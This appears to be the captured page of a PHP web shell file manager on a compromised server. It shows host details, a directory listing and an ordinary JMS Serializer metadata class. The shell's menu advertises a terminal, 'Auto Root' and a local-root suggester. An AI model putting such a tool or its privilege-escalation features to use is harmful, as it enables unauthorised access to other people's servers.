Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.171.53
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
jms /
serializer /
src /
Metadata /
Delete
Unzip
Name
Size
Permission
Date
Action
Driver
[ DIR ]
drwxrwxr-x
2022-08-24 15:26
ClassMetadata.php
12.71
KB
-rw-rw-r--
2022-08-24 15:26
ExpressionPropertyMetadata.php
1.16
KB
-rw-rw-r--
2022-08-24 15:26
PropertyMetadata.php
7.08
KB
-rw-rw-r--
2022-08-24 15:26
StaticPropertyMetadata.php
1.2
KB
-rw-rw-r--
2022-08-24 15:26
VirtualPropertyMetadata.php
626
B
-rw-rw-r--
2022-08-24 15:26
Save
Rename
<?php declare(strict_types=1); namespace JMS\Serializer\Metadata; use JMS\Serializer\Expression\Expression; /** * @Annotation * @Target("METHOD") * * @author Asmir Mustafic <goetas@gmail.com> */ #[\Attribute(\Attribute::TARGET_METHOD)] class ExpressionPropertyMetadata extends PropertyMetadata { /** * @var string|Expression */ public $expression; /** * @param string|Expression $expression */ public function __construct(string $class, string $fieldName, $expression) { $this->class = $class; $this->name = $fieldName; $this->expression = $expression; $this->readOnly = true; } public function setAccessor(string $type, ?string $getter = null, ?string $setter = null): void { } /** * {@inheritdoc} */ protected function serializeToArray(): array { return [ $this->expression, parent::serializeToArray(), ]; } protected function unserializeFromArray(array $data): void { [ $this->expression, $parentData, ] = $data; parent::unserializeFromArray($parentData); } }